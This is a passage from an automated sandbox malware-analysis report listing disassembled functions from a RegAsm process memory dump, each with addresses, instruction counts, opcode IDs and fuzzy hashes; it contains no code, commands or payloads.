                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 93c2a19666413ab9f400d1b7872a03c7fc96242e82f21e6db902c6c79d7bdab7
                                                                  • Instruction ID: 9a407bdc96c74e76d92ed5144f8a4fe6f1f4e12db280666d0dd749b8afd0197b
                                                                  • Opcode Fuzzy Hash: 93c2a19666413ab9f400d1b7872a03c7fc96242e82f21e6db902c6c79d7bdab7
                                                                  • Instruction Fuzzy Hash: 30529C32518711CBC725DF18D48066BB3E2FFD4304F298A3ED9D6A7295D339A851CB8A
                                                                  Function 0040B470 Relevance: .7, Instructions: 670COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e250b38837fd4715581710c8edbcd8addf5a3626a2f5f82d9d280fee6d3a6ce6
                                                                  • Instruction ID: 642af7f9f4cc5c3a0bb655affbc7381b50852d66d18f9bbee6aa8b5c7dd6b660
                                                                  • Opcode Fuzzy Hash: e250b38837fd4715581710c8edbcd8addf5a3626a2f5f82d9d280fee6d3a6ce6
                                                                  • Instruction Fuzzy Hash: 98528070A087848FE7359B24C4847A7BBE1EB91314F14893EC5E656BC2C37DA885C79E
                                                                  Function 00407470 Relevance: .7, Instructions: 657COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cc0350b755ec659348fbe488e8fd628042ee9f5c1c3e63c7348debc874760767
                                                                  • Instruction ID: 6f34d658e8bf016dbeb144df8a802002908009c297ca34febf58999a114b199a
                                                                  • Opcode Fuzzy Hash: cc0350b755ec659348fbe488e8fd628042ee9f5c1c3e63c7348debc874760767
                                                                  • Instruction Fuzzy Hash: 4052B531A0C3458FCB15CF14C0906AABBE1BF85314F198A7EE89967391D778E949CF86
                                                                  Function 00449E60 Relevance: .6, Instructions: 592COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 990ef5858da270fcd5c714f1cbe9946898f94eece37d7b40759dc2b22a897ddf
                                                                  • Instruction ID: b09a89ab5c6bd6caec74fff7b76334741940ee79584cb71c8e44f9d779eadac0
                                                                  • Opcode Fuzzy Hash: 990ef5858da270fcd5c714f1cbe9946898f94eece37d7b40759dc2b22a897ddf
                                                                  • Instruction Fuzzy Hash: 5412BB31A08251CFDB04CF68D8A066FBBF1EF8A315F19882EE58597392D735D910CB96
                                                                  Function 00407E70 Relevance: .6, Instructions: 592COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 455a2def3cd4607b69d4b082b196bca4304fdf693d3f57c27b18c8d8b9c72b05
                                                                  • Instruction ID: d8883f6032b0fcb3f38433067063a771a19ae62be6b80c3b146bdb5a26dcf8d1
                                                                  • Opcode Fuzzy Hash: 455a2def3cd4607b69d4b082b196bca4304fdf693d3f57c27b18c8d8b9c72b05
                                                                  • Instruction Fuzzy Hash: A2320470915B118FC368CF29C69052ABBF1BF85710B604A2ED6D797B90DB3AF845CB18
                                                                  Function 00409737 Relevance: .5, Instructions: 536COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 25a37c5f3b2a29ae68063d4fa164d6ca2caf11f32dc11329077550f3d7966334
                                                                  • Instruction ID: f47fbb57d13c9069d1454bbcb43e8b3ccbc00d4dd581e02e1339e424f1ba8f71
                                                                  • Opcode Fuzzy Hash: 25a37c5f3b2a29ae68063d4fa164d6ca2caf11f32dc11329077550f3d7966334
                                                                  • Instruction Fuzzy Hash: F632623520D380EFC350CF28D880B5FBBE2AF99305F44896DF585962A2D375D968CB5A
                                                                  Function 00447EDE Relevance: .5, Instructions: 476COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4c3c3a21c1b2ee73e811332f6a8e1be64b185d4f77f219ba96861ff91651a30
                                                                  • Instruction ID: 5549ba11c2e90eb234b7c5423a8fbfb4a77ff2f39bf50e673c9bd4f9aa49bd64
                                                                  • Opcode Fuzzy Hash: a4c3c3a21c1b2ee73e811332f6a8e1be64b185d4f77f219ba96861ff91651a30
                                                                  • Instruction Fuzzy Hash: 9D02EDB5A18255CFDB10CF68E8906BEBBB1FF09322F144579D851A7392C339E941CB94
                                                                  Function 0040A3C0 Relevance: .4, Instructions: 448COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e0537d3602b05352d162d47d3b37e8bd64bb5caa79fc0b4c4570d86523830f7e
                                                                  • Instruction ID: 3dfa834cc95e5c00a0169a4d3e9d9aa564f73bc0227f910f465499f90f335f9d
                                                                  • Opcode Fuzzy Hash: e0537d3602b05352d162d47d3b37e8bd64bb5caa79fc0b4c4570d86523830f7e
                                                                  • Instruction Fuzzy Hash: 94F1D036608341CFC724CF29C88166BFBE2AFD9304F08892DE4C597791E679E859CB56
                                                                  Function 00409A02 Relevance: .3, Instructions: 334COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e47e641f6539b63304e02ccc8e37126c79fa7862bb363966f8b44626d7d288a8
                                                                  • Instruction ID: e9468965110a56bb6032bd079094f40f30306602c7693c164a2ba2fb52d1037e
                                                                  • Opcode Fuzzy Hash: e47e641f6539b63304e02ccc8e37126c79fa7862bb363966f8b44626d7d288a8
                                                                  • Instruction Fuzzy Hash: 4FE1363520D380EFC350CF28D88064FBBE1AFD9305F48896DF489972A2D674DA65CB5A
                                                                  Function 0040AFD0 Relevance: .3, Instructions: 315COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1403e308c14c929368f100250f5dbe3fa0503215152504074aca5edbc24086c7
                                                                  • Instruction ID: 0f752fb7c09d9405a44515831a65da3327b3eea3726c8d910d67014fc478ec9c
                                                                  • Opcode Fuzzy Hash: 1403e308c14c929368f100250f5dbe3fa0503215152504074aca5edbc24086c7
                                                                  • Instruction Fuzzy Hash: FEC158B2A087518FC320CF28C8967ABB7E0EF85318F08492DD5D9D7342D778A555CB8A
                                                                  Function 00449970 Relevance: .3, Instructions: 304COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07db187edf6147d719a46b6995ef8d341e827bc120329527b02f881573074e8e
                                                                  • Instruction ID: 3abc21bc3e95f8a3451e8ced2770bdd05b99c4f40b96798a60550f29323ea1a7
                                                                  • Opcode Fuzzy Hash: 07db187edf6147d719a46b6995ef8d341e827bc120329527b02f881573074e8e
                                                                  • Instruction Fuzzy Hash: D6A1DF75A04246CFDB00CF68E8A166FB7B1FB49312F194479D945A7362C334ED50CB95
                                                                  Function 004146B5 Relevance: .3, Instructions: 277COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c87b0577a19f319f0e9110632791b19f836fd9125dd7ec814634750cc2e76d1
                                                                  • Instruction ID: 30348db68d5ad48780b53f830896320fa6a754e42e300085adc231b94485e5cf
                                                                  • Opcode Fuzzy Hash: 0c87b0577a19f319f0e9110632791b19f836fd9125dd7ec814634750cc2e76d1
                                                                  • Instruction Fuzzy Hash: 13A149B45107419FD3218F29D880B57FBF1EF5A304F24491EE4D997392E33AA894CB99
                                                                  Function 00413AE6 Relevance: .3, Instructions: 274COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ce6abbaf5585abdbf9dd583f7fadd13d82129c0f32841ca5fd319ead2268f8f
                                                                  • Instruction ID: 63722bcf266d008e4d2fb854599f640af6bf96e83537b373199111c124b4d8f9
                                                                  • Opcode Fuzzy Hash: 3ce6abbaf5585abdbf9dd583f7fadd13d82129c0f32841ca5fd319ead2268f8f
                                                                  • Instruction Fuzzy Hash: 2E917C716007418FD321CF28D880B67BBF2EF56305F24492ED49697352E739E985CB98
                                                                  Function 00448F80 Relevance: .3, Instructions: 263COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4cfbc533af8237bfb87faf514cffbbcd245806f9c3fcdb4a2b25e3d0f958fb9c
                                                                  • Instruction ID: a865c3e9e599e2c5329ba543cd513e4d394582e1008898d159b2fc64aeb1c2dc
                                                                  • Opcode Fuzzy Hash: 4cfbc533af8237bfb87faf514cffbbcd245806f9c3fcdb4a2b25e3d0f958fb9c
                                                                  • Instruction Fuzzy Hash: A5811BB2A042106BF724AA29DC4577B76D9EBC0318F04493EF999D7342EA78EC058756
                                                                  Function 00415078 Relevance: .3, Instructions: 251COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d573fe2f6a3767f09d46f836eae65ef577eb19577032d8ef79d8b00ea0b12847
                                                                  • Instruction ID: 252b9328507afdb69cb8149bd6720b98ca481bb8e256363331bcbe9542f63dac
                                                                  • Opcode Fuzzy Hash: d573fe2f6a3767f09d46f836eae65ef577eb19577032d8ef79d8b00ea0b12847
                                                                  • Instruction Fuzzy Hash: 64818AB0A00701DFD321DF29D880A66B7F5FF9A304F14496EE58687752E339E845CBA9
                                                                  Function 0042F5B7 Relevance: .2, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d22ac0c0b173eb1919838105268375d851d508c68cd57ff142b5b389bdcbe304
                                                                  • Instruction ID: b2b5ecf074de91ac914dfd965cb03f707f4f16325c0c4ea283c80723a3d79eb4
                                                                  • Opcode Fuzzy Hash: d22ac0c0b173eb1919838105268375d851d508c68cd57ff142b5b389bdcbe304
                                                                  • Instruction Fuzzy Hash: 8F714A742083518BD710DF18D890B2BB7F0FF96744F94192EE4D19B361D3799909CB9A
                                                                  Function 004091F0 Relevance: .2, Instructions: 202COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fe22b2f1523c9728c54192698233e5564d6db77466d882a97c05fe3809ff67cf
                                                                  • Instruction ID: 74377abc01be29dba5f3574a8361ef8460b3e5f34b7c9c05be143a1f22df5017
                                                                  • Opcode Fuzzy Hash: fe22b2f1523c9728c54192698233e5564d6db77466d882a97c05fe3809ff67cf
                                                                  • Instruction Fuzzy Hash: C2619A79609302CFD318CF25D8903AAB7E2FB89306F08C97CE984822A5C779D959DF45
                                                                  Function 0043EF50 Relevance: .2, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75c3e7660cebeb35403fb5e171a61a3583f9db5666e03dd2ca4b7871bec4d933
                                                                  • Instruction ID: c00be4d41a0304ea6ce13eecc6499725f03711e281a0341f2dbc33ca0e0599d6
                                                                  • Opcode Fuzzy Hash: 75c3e7660cebeb35403fb5e171a61a3583f9db5666e03dd2ca4b7871bec4d933
                                                                  • Instruction Fuzzy Hash: 26515EB19087548FE714DF29D89435BBBE1BBC8318F444A2EE4E587351E379DA088F86
                                                                  Function 00438C00 Relevance: .2, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d72acbbd7377a4364bca26e5100232256b15d0ea39b950b589fe2db1b198ccfd
                                                                  • Instruction ID: cf93265e453f1b4f50de29a8b8c3f842b101a0cdbe79ed852c4bee78df836707
                                                                  • Opcode Fuzzy Hash: d72acbbd7377a4364bca26e5100232256b15d0ea39b950b589fe2db1b198ccfd
                                                                  • Instruction Fuzzy Hash: 6A51193A60979147D718593C5C113B9EA434BAB334F2DA36FF9B2473D1CA1D48065399
                                                                  Function 00405D20 Relevance: .2, Instructions: 163COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3fb784b57021d17c2da16b2eb1e48beda536bd8e8057a2e69ade5c5409e6bff6
                                                                  • Instruction ID: a8df0a3c83d2a2110b9e98db97d42556f66ce4b46fc752b3147b0d49ab485b89
                                                                  • Opcode Fuzzy Hash: 3fb784b57021d17c2da16b2eb1e48beda536bd8e8057a2e69ade5c5409e6bff6
                                                                  • Instruction Fuzzy Hash: B35190B5A046019FC714DF18C480927B7A1FF85324F19467EF899AB392D639EC42CF9A
                                                                  Function 00449B60 Relevance: .1, Instructions: 142COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61d0137ac8db55894e61deab45fae808b6956607a8738703e62f5a3786923e60
                                                                  • Instruction ID: 6773b3426544a07c00623eb10f663d771092178658317beae7ed4357cd2a5b97
                                                                  • Opcode Fuzzy Hash: 61d0137ac8db55894e61deab45fae808b6956607a8738703e62f5a3786923e60
                                                                  • Instruction Fuzzy Hash: 87418A35A14212CFDB44CFA8E9E166EB3B1FB49312F19407AD905A7362C774EE20CB65
                                                                  Function 00411420 Relevance: .1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2b423ebadf1592669d7d863c5a3ee5f5f2eab39b8738c23b7edf78d6bbbe3fc
                                                                  • Instruction ID: 56fe226764b8c279c2f95357b1d9cf27a8c0a2024e96dee972e1ff8b9330b8b4
                                                                  • Opcode Fuzzy Hash: b2b423ebadf1592669d7d863c5a3ee5f5f2eab39b8738c23b7edf78d6bbbe3fc
                                                                  • Instruction Fuzzy Hash: 6E4114722183650FD30CDF39889037ABBD2AB89310F098A3EE5E6C73A1E678C945D715
                                                                  Function 00404C10 Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08c903a2774bc6df5269ec9394e4d2b4249a1b345d6e6f96374d041045904a8a
                                                                  • Instruction ID: c79a31c9f9310a5d27d3133cd9e14fd18c2759f751e933cf278d23621f9b5f89
                                                                  • Opcode Fuzzy Hash: 08c903a2774bc6df5269ec9394e4d2b4249a1b345d6e6f96374d041045904a8a
                                                                  • Instruction Fuzzy Hash: 7A31CBB060D2009BE7149F59D884927B7E1EFC5318F15893EE99AA7391D339DC42C74A
                                                                  Function 0043B510 Relevance: .1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                  • Instruction ID: b05e4e55af9010276dd824703dcfe013dc4d2d587545692900b47515503f7f9a
                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                  • Instruction Fuzzy Hash: 7C110633A051D40EC3128D3C8440665BFE34A9B339F1D939AE4B89B2D2D7268D8A8399
                                                                  Function 004381AA Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f9c2bea97cd4b5019ae85a024de50666d4b8a38e840c2ed61b965e1ee9b65ad
                                                                  • Instruction ID: 9af3802c06223be0731618dc7dbb9ccf8b70dac9e7fe2982a45eb8f2898826f2
                                                                  • Opcode Fuzzy Hash: 4f9c2bea97cd4b5019ae85a024de50666d4b8a38e840c2ed61b965e1ee9b65ad
                                                                  • Instruction Fuzzy Hash: BA21E9F0900B40AFD360EF3AC94674BBEF8EB45350F104A1EF8AA87690D371A4058BD6
                                                                  Function 00430BD0 Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 280971b818c92cda73003084fe35fa709fc308098d1831b144d262705e9ce05f
                                                                  • Instruction ID: b670d169a067c456f2208e1d1a858f62b16ae88675da2f6f7e379deb6076660f
                                                                  • Opcode Fuzzy Hash: 280971b818c92cda73003084fe35fa709fc308098d1831b144d262705e9ce05f
                                                                  • Instruction Fuzzy Hash: F70192B570030187E7249E5194E0B3BF2A9AB88718F18273ED40657341DB7DEC05C699
                                                                  Function 00445D80 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a0f5b615599201c8fcbc61bbc80d2da29338f02ce58a985c5e93859dfe3cbdcf
                                                                  • Instruction ID: 127a2d2f99be075313f8e7c8ce123115a8f99d52567ae3d6d9a7df168031d728
                                                                  • Opcode Fuzzy Hash: a0f5b615599201c8fcbc61bbc80d2da29338f02ce58a985c5e93859dfe3cbdcf
                                                                  • Instruction Fuzzy Hash: C71149B0918380AFE704DFA4D54491FFBE4AB82708F50982DF4D487342D739D909CB5A
                                                                  Function 00407120 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2bca8451c7a21ffdc08514427d5aae7525460325ea45c90652cec291e1702db1
                                                                  • Instruction ID: 428b66cca32f92671de047a37f04ba4cdfb14e9a1c088c886c69018fb4604205
                                                                  • Opcode Fuzzy Hash: 2bca8451c7a21ffdc08514427d5aae7525460325ea45c90652cec291e1702db1
                                                                  • Instruction Fuzzy Hash: 14F02B36B582160BD718CE55ECE0D77B366D7CA255B09003EDA42E73C1C974F806D269
                                                                  Function 0041A880 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a262c98f02bee36f9e7b41f4a9b905533450b75733afa39f2542f44ca0caaf6
                                                                  • Instruction ID: 84a41c4c3f528dc72163e8ca054b40d510caf23feb84efc27826b8445e6de5a1
                                                                  • Opcode Fuzzy Hash: 7a262c98f02bee36f9e7b41f4a9b905533450b75733afa39f2542f44ca0caaf6
                                                                  • Instruction Fuzzy Hash: 0CF0ECB1B0411067DB22B9559CC0FF7BB9CCB87364F190416E84957282E2755CD6C7EB
                                                                  Function 00442280 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                  • Instruction ID: ca0a47249e4e9b4ad93b56322b99e3a16fb2ee89d7d4b9e5124314e38bcc9f3b
                                                                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                  • Instruction Fuzzy Hash: 57D05E2160862146BB688E19A500977F7E0FAC7B11B89959FF582E3248D274DC41C2AD
                                                                  Function 004371AB Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit
                                                                  • String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
                                                                  • API String ID: 2610073882-164105402
                                                                  • Opcode ID: 7ea49bbc964831e1d19dd7b4cdbf91261241450e64375c5e647d5cd4bb619ec2
                                                                  • Instruction ID: e486607e4b5c263a131017f9b849749757e5c2ed8deb2f4ba38f941ca55cc11a
                                                                  • Opcode Fuzzy Hash: 7ea49bbc964831e1d19dd7b4cdbf91261241450e64375c5e647d5cd4bb619ec2
                                                                  • Instruction Fuzzy Hash: CC41F9600087C18ED726CF2984C8606BFA16F16224F488ADDD8E54F7DBC775D519C7A6
                                                                  Function 00435993 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit
